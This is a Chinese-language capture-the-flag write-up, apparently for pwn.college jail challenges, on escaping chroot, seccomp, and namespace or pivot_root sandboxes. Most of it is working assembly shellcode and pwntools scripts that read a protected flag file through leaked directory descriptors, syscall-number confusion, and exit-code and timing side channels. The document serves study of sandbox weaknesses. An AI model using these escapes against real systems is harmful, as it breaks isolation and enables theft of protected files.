- 1. chroot 逃逸
- 2. chroot + seccomp 逃逸
- 2.1 利用chroot之前打开的目录/文件描述符实现逃逸
- 2.1.1 只允许(“openat”, “read”, “write”, “sendfile”)
- 2.1.2 只允许(“linkat”, “open”, “read”, “write”, “sendfile”)
- 2.1.3 只允许(“fchdir”, “open”, “read”, “write”, “sendfile”)
- 2.1.4 只允许(“chdir”, “chroot”, “mkdir”, “open”, “read”, “write”, “sendfile”)
- 2.1.5 只允许(“read”, “exit”)
- 2.1.6 只允许(“read”, “nanosleep”)
- 2.1.7 只允许(“read”)
- 2.2 利用syscall confusion实现逃逸
- 2.1 利用chroot之前打开的目录/文件描述符实现逃逸
- 3. 父子进程+ seccomp 逃逸
- 4. namespace +pivot_root 逃逸
- 附录:利用chroot之前打开的目录/文件描述符 —— 手法
1. chroot 逃逸
chroot详情可看https://wsxk.github.io/sandboxing/
1.1 相对路径逃逸
前文提到,chroot是改变了”/”在程序的根目录,这意味着绝对路径的访问会被限制,但是相对路径(这取决于你是在哪个目录下运行程序的)是可以绕过这个机制的。如果程序的当前工作目录没有被改变(即没有调用chdir(“/”)的话),这个方法大有可为
示例如下:
上述场景中:
1. 真flag 位于 /flag
2. 假flag 位于 /tmp/jaio-eyqnjg/flag
3. 程序的当前工作目录是 /home/wsxk/Desktop/CTF/sandboxing
因此绕过时使用的是../../../../../flag
当然,如果容器里允许你执行shellocde,那么可以尝试利用之前提到相对路径方法,编写shellcode实现逃逸
当然,这个方法也要求程序的当前工作目录没有被改变(即没有调用chdir(“/”))
.global _start
_start:
.intel_syntax noprefix
mov rax, 2 # open
lea rdi, [rip+file_path] # path
mov rsi, 0 # flags O_RDONLY
mov rdx, 0 # 当指定O_CREAT时,设定文件的权限,这里就没意义
syscall
mov rdi, 1 # 输出的文件描述符
mov rsi, rax # 输入的文件描述符
mov rdx, 0 # offset,0就是从头开始
mov r10, 128 # length,长度
mov rax, 40 # sendfile
syscall
file_path:
.string "../../../flag"
编译命令如下:
gcc -nostdlib -static shellcode.s -o shellcode-elf
objcopy --dump-section .text=shellcode-raw shellcode-elf
cat shellcode-raw | /path/to/container/path
1.2 利用chroot之前打开的目录/文件描述符实现逃逸
条件进程在调用chroot、chdir之前,打开了一个目录,例子: open("/", O_RDONLY|O_NOFOLLOW)
可以利用这个实现打开的文件描述符,结合openat
系统调用,在shellcode中编写代码完成逃逸
openat
的原型解释如下:
int openat(int dirfd, const char *pathname, int flags, mode_t mode);
dirfd:之前打开的目录描述符,一般情况下都是3
pathname:文件路径,如果为绝对路径,则忽略dirfd;如果是相对路径,则相对于 dirfd 指定的目录。
flags:文件打开模式O_RDONLY ,O_WRONLY,O_RDWR
mode:行为模式,例子:O_CREAT(如果文件不存在则创建)。当然一般填0
实际执行时的shellcode为
.global _start
_start:
.intel_syntax noprefix
mov rax, 257 #openat
mov rdi, 3 # assume opened dir fd = 3
lea rsi, [rip+file_path]
mov rdx, 0 # O_RDONLY
syscall
mov rdi, 1
mov rsi, rax
mov rdx, 0 # offset
mov r10, 128 # length
mov rax, 40 # sendfile
syscall
file_path:
.string "flag"
可以用cat shellcode.raw | strace -f /challenge/babyjail_level3 /
调试系统调用出现的问题
-f
选项指的是跟随fork继续追踪系统调用。
注意像strace gdb等调试工具,在调试具有suid权限的程序时,会主动舍弃suid权限,要想继续追踪,需要修改内核文件sudo sysctl kernel.yama.ptrace_scope=0.(当然,如果你直接以root权限允许strace、gdb等,就没这个问题)
2. chroot + seccomp 逃逸
seccomp添加了限制,只允许你调用没被禁用的系统调用,如何根据这些系统调用获取flag就是本章节要讲解的目标
2.1 利用chroot之前打开的目录/文件描述符实现逃逸
这个思路之前也提到过,总之就是非常好用。
2.1.1 只允许(“openat”, “read”, “write”, “sendfile”)
在只有4个系统调用被允许时,shellcode编写如下
.global _start
_start:
.intel_syntax noprefix
mov rax, 257 #openat
mov rdi, 3 # assume opened dir fd = 3
lea rsi, [rip+file_path]
mov rdx, 0 # O_RDONLY
syscall
mov rdi, 1
mov rsi, rax
mov rdx, 0
mov r10, 128
mov rax, 40
syscall
file_path:
.string "flag"
2.1.2 只允许(“linkat”, “open”, “read”, “write”, “sendfile”)
linkat 是 Linux 系统调用的一部分,用于创建一个硬链接。它比传统的 link 函数功能更灵活,允许通过文件描述符指定路径,支持相对路径,并提供额外的标志来控制操作行为。
int linkat(int olddirfd, const char *oldpath,
int newdirfd, const char *newpath, int flags);
olddirfd: 创建硬链接的源文件所在的目录描述符
oldpath: 创建硬链接的源文件路径,相对路径则为olddirfd/oldpath,绝对路径则为oldpath
newdirfd:创建硬链接的目标文件所在的目录描述符
newpath: 创建硬链接的目标文件路径,同oldpath
flags: 当前只有一个 AT_SYMLINK_FOLLOW,如果 oldpath 是一个符号链接,则对其解析为目标文件(默认情况下符号链接被当作普通文件)
实际编写的shellcode如下:
.global _start
_start:
.intel_syntax noprefix
mov rax, 265 #linkat
mov rdi, 3 # assume opened dir fd = 3
lea rsi, [rip+file_path]
mov rdx, 3 #assume opened dir fd = 3
lea r10, [rip+test_path]
mov r8, 0 #flags=0
syscall
mov rax, 2 # open
lea rdi, [rip+test_path] # path
mov rsi, 0 # flags O_RDONLY
mov rdx, 0 # 当指定O_CREAT时,设定文件的权限,这里就没意义
syscall
mov rdi, 1
mov rsi, rax
mov rdx, 0
mov r10, 128
mov rax, 40 # sendfile
syscall
file_path:
.string "flag"
test_path:
.string "/test"
2.1.3 只允许(“fchdir”, “open”, “read”, “write”, “sendfile”)
fchdir
的作用与chdir
类似用于改变当前工作目录,fchdir
以文件描述符
int fchdir(int fd);
fd: 你要修改的目录的描述符
实际shellcode如下:
.global _start
_start:
.intel_syntax noprefix
mov rax, 81 #fchdir
mov rdi, 3 # assume opened dir fd = 3
syscall
mov rax, 2 # open
lea rdi, [rip+file_path] # path
mov rsi, 0 # flags O_RDONLY
mov rdx, 0 # 当指定O_CREAT时,设定文件的权限,这里就没意义
syscall
mov rdi, 1
mov rsi, rax
mov rdx, 0
mov r10, 128
mov rax, 40 # sendfile
syscall
file_path:
.string "flag"
test_path:
.string "/test"
2.1.4 只允许(“chdir”, “chroot”, “mkdir”, “open”, “read”, “write”, “sendfile”)
本质上是利用chroot需要root权限(CAP_SYS_CHROOT)
,如果程序在执行chroot后仍然保留root权限,可以随时越狱
利用如下原理:
1. mkdir test
2. chroot test
3. chdir ../../
主动营造出cwd(当前工作目录)和/不同的场景,从而构造出相对路径逃逸场景
.global _start
_start:
.intel_syntax noprefix
mov rax, 83 # mkdir
lea rdi, [rip+test_path]
mov rsi, 511 #0777
syscall
mov rax, 161 # chroot
lea rdi, [rip+test_path] # path
syscall
mov rax, 80 #chdir
lea rdi, [rip+point_path]
syscall
mov rax, 2 #open
lea rdi, [rip+file_path]
mov rsi, 0
mov rdx, 0
syscall
mov rdi, 1
mov rsi, rax
mov rdx, 0
mov r10, 128
mov rax, 40 # sendfile
syscall
file_path:
.string "flag"
test_path:
.string "test"
point_path:
.string "../../"
2.1.5 只允许(“read”, “exit”)
这种情况就比较搞了。只能利用exit的退出的返回值来泄露flag信息
但是exit的返回值大小是有限的,要想返回你所需的足够信息,你需要多次调用,这就需要用python来自动化运行了(相信我,你不会希望手打的)
脚本如下:
from pwn import *
flag = ""
for i in range(57):
p = process(["/challenge/babyjail_level10","/flag"])
shellcode = """
mov rdi, 3
lea rsi, [rip+buffer]
mov rdx, 0x100
mov rax, 0
syscall
xor rdi, rdi
mov dil, [rip+buffer+{}]
mov rax, 60
syscall
buffer:
.space 0x100
"""
shellcode = shellcode.format(i)
#print(shellcode)
shellcode = asm(shellcode,arch="amd64")
#print(shellcode)
p.sendline(shellcode)
p.wait()
flag += chr(p.returncode)
print(flag)
2.1.6 只允许(“read”, “nanosleep”)
这种情况可以根据睡眠的时间来获取信息,虽然很抽象,但真的可行!
struct timespec {
time_t tv_sec; // 秒数 (seconds)
long tv_nsec; // 纳秒数 (nanoseconds), 范围:0 ~ 999,999,999
};
int nanosleep(const struct timespec *req, struct timespec *rem);
//req:指向一个timespec结构体,其结构为
//rem: 睡眠被中断时用来存储剩下的时间,可以直接填NULL
泄露信息的脚本如下:
from pwn import *
import time
#context.log_level = 'debug'
flag = "pwn.college{"
for i in range(12,55):
for j in range(32,128):
p = process(["/challenge/babyjail_level11","/flag"])
#print(p.recv())
shellcode = """
mov rdi, 3
lea rsi, [rip+buffer]
mov rdx, 0x100
mov rax, 0
syscall
xor rdi, rdi
xor rsi, rsi
mov sil, [rip+buffer+{}]
mov dil, {}
cmp sil, dil
jne end
lea rdi, [rip+time]
mov rsi, 0
mov rax, 35
syscall
end:
ret
buffer:
.space 0x100
time:
.quad 1
.quad 100000
"""
shellcode = shellcode.format(i,j)
#print(shellcode)
shellcode = asm(shellcode,arch="amd64")
#print(shellcode)
#with open("shellcode.test","wb") as f:
# f.write(shellcode)
p.sendline(shellcode)
start_time = time.time()
p.wait()
end_time = time.time()
#print(p.recv())
p.close()
if end_time-start_time >= 1:
#print("hit character:"+ chr(j))
flag += chr(j)
print("index:"+chr(i))
print(flag)
pause()
break
else :
print("not hit")
print(end_time-start_time)
flag += "}"
print(flag)
2.1.7 只允许(“read”)
核心还是和2.1.6节提到的一样,使用侧信道的方式获取flag
虽然我们不能调用sleep相关的syscall,但是可以手动建造循环来增加运行时间
from pwn import *
import time
#context.log_level = 'debug'
flag = "pwn.college{"
for i in range(12,55):
for j in range(32,128):
p = process(["/challenge/babyjail_level12","/flag"])
#print(p.recv())
shellcode = """
mov rdi, 3
lea rsi, [rip+buffer]
mov rdx, 0x100
mov rax, 0
syscall
xor rdi, rdi
xor rsi, rsi
mov sil, [rip+buffer+{}]
mov dil, {}
cmp sil, dil
jne end
mov rcx, 1000000000
mov rax, 0
loop:
add rax, 1
cmp rax, rcx
jle loop
end:
ret
buffer:
.space 0x100
"""
shellcode = shellcode.format(i,j)
#print(shellcode)
shellcode = asm(shellcode,arch="amd64")
#print(shellcode)
#with open("shellcode.test","wb") as f:
# f.write(shellcode)
p.sendline(shellcode)
start_time = time.time()
p.wait()
end_time = time.time()
#print(p.recv())
p.close()
if end_time-start_time >= 0.07:
#print("hit character:"+ chr(j))
flag += chr(j)
print("index:"+chr(i))
print(flag)
print(end_time-start_time)
#pause()
break
else :
print("not hit")
print(end_time-start_time)
flag += "}"
print(flag)
2.2 利用syscall confusion实现逃逸
细节请看https://wsxk.github.io/sandboxing/
总之就是x86的系统调用和x64的系统调用,相同系统调用号指向不同的系统调用
2.2.1 只限制x64,不限制x86
scmp_filter_ctx ctx;
puts("Restricting system calls (default: allow).\n");
ctx = seccomp_init(SCMP_ACT_ALLOW);
for (int i = 0; i < 512; i++)
{
switch (i)
{
case SCMP_SYS(close):
printf("Allowing syscall: %s (number %i).\n", "close", SCMP_SYS(close));
continue;
case SCMP_SYS(stat):
printf("Allowing syscall: %s (number %i).\n", "stat", SCMP_SYS(stat));
continue;
case SCMP_SYS(fstat):
printf("Allowing syscall: %s (number %i).\n", "fstat", SCMP_SYS(fstat));
continue;
case SCMP_SYS(lstat):
printf("Allowing syscall: %s (number %i).\n", "lstat", SCMP_SYS(lstat));
continue;
}
assert(seccomp_rule_add(ctx, SCMP_ACT_KILL, i, 0) == 0);
}
puts("Adding architecture to seccomp filter: x86_32.\n");
seccomp_arch_add(ctx, SCMP_ARCH_X86);
puts("Executing shellcode!\n");
assert(seccomp_load(ctx) == 0);
这段代码,只允许4个系统调用close,stat,lstat,fstat
在x64中,系统调用号为:3,4,5,6
然而并没有x86架构的系统调用限制
因此,只要执行正常的x86架构即可逃逸
.global _start
_start:
.intel_syntax noprefix
mov eax, 295 #openat
mov ebx, 3 # assume opened dir fd = 3
lea ecx, [eip+file_path]
mov edx, 0 # O_RDONLY
int 0x80
mov ebx, 1
mov ecx, eax
mov edx, 0
mov esi,128
mov eax, 187 # sendfile
int 0x80
file_path:
.string "flag"
3. 父子进程+ seccomp 逃逸
该场景下,子进程只能跟父进程进行通信,且运用seccomp导致子进程只能使用("read","write","exit")
这3个系统调用,核心思想是通过操纵子进程的执行来达到操作父进程输出我们所需的信息
.global _start
_start:
.intel_syntax noprefix
mov rax, 1 #write
mov rdi, 4 #assume child_socket fd = 4
lea rsi, [rip+open_flag]
mov rdx, 0x80
syscall
mov rax, 0 #read
mov rdi, 4
lea rsi, [rip+buffer+10]
mov rdx, 0x80
syscall
mov rax, 1 #write
mov rdi, 4
lea rsi, [rip+buffer]
mov rdx, 0x80
syscall
ret
open_flag:
.string "read_file:/flag"
buffer:
.string "print_msg:"
.space 0x100
4. namespace +pivot_root 逃逸
4.1 pivot_root后未删除old目录
通常,在使用pivot_root
会要求创建old
目录来挂载旧文件系统,如果创建容器后没有删除old
目录,将导致用户通过old
目录访问宿主机文件系统。
解决办法:umount2(“/old”, MNT_DETACH)
4.2 mount的目录在所有命名空间中共享
如果你通过例如mount("/old/bin", "/bin", NULL, MS_BIND, NULL)
将/old/bin
的内容挂载到/bin
中,实际上这两个目录共享同一个文件系统的内容,因此,如果是宿主机-虚拟机-容器的布局中,你进入虚拟机然而是普通用户,创建的容器具有root权限且虚拟机和容器的文件系统共享,你可以通过chmod +s xxx
来提升你在虚拟机中的用户权限~
解决办法:挂载目录后,再挂载一次,mount(NULL, “/proc”, NULL, MS_REMOUNT|MS_RDONLY|MS_BIND, NULL),设置为只读即可
4.3 没有隔离pid namespace
在只创建了mount namespace
的场景下,可以直接通过如下命令获取信息:
cat /proc/1/root/flag
即可获得flag!
/proc/1/root 是一个特殊的符号链接(symlink),位于 Linux 的 /proc 伪文件系统中。它指向了进程号为 1 的进程(通常是 init 或 systemd)所看到的 根目录(root filesystem)。
解决办法,创建pid namespace即可
4.4 利用pivot_root之前打开的目录/文件描述符实现逃逸
同2.1节
4.5 利用pivot_root之前挂载的目录实现逃逸
这个场景下,允许你在执行pivot_root
前挂载一个目录,此时可以选择挂载/proc/1/ns
目录到data
中
随后可以使用setns
系统调用更换进程的命名空间,完成逃逸
.global _start
_start:
.intel_syntax noprefix
# 打开一个命名空间
mov rax, 2 #open
lea rdi, [rip+file_path]
mov rsi, 0 # O_RDONLY
mov rdx, 0
syscall
# setns进入该命名空间
mov rdi, rax
mov rsi, 0 #表示不检查命名空间类型
mov rax, 0x134 # setns
syscall
# 打开flag文件
mov rax, 2
lea rdi, [rip+flag_path]
mov rsi, 0
mov rdx, 0
syscall
mov rdi, 1
mov rsi, rax
mov rdx, 0 # offset
mov r10, 128 # length
mov rax, 40 # sendfile
syscall
file_path:
.string "/data/mnt"
flag_path:
.string "../../../../../../flag"
附录:利用chroot之前打开的目录/文件描述符 —— 手法
附录A:程序本身在chroot之前已打开目录/文件描述符
这种情况就比较好说,重点是记住内核中文件描述符一般是顺序递增的,0 代表标准输入,1代表标准输出,2代表标准错误,程序另外打开的文件的文件描述符依次是3 4 5...
如果程序自己就开好了,直接利用就完事了。
附录B:bash tricks
核心思路是在允许chroot前,利用/bin/bash自己创建一个文件描述符,让chroot的程序继承父进程的文件描述符。
exec 3>/flag #文件描述符3绑定/flag文件,只写模式; 实际上 exec 3<>/flag也可以,表示读写模式绑定文件
exec 4</ #文件描述符4绑定/目录 ; 因为目录不能写,只能读,因此只能用<
cat shellcode.raw | /path/to/your/program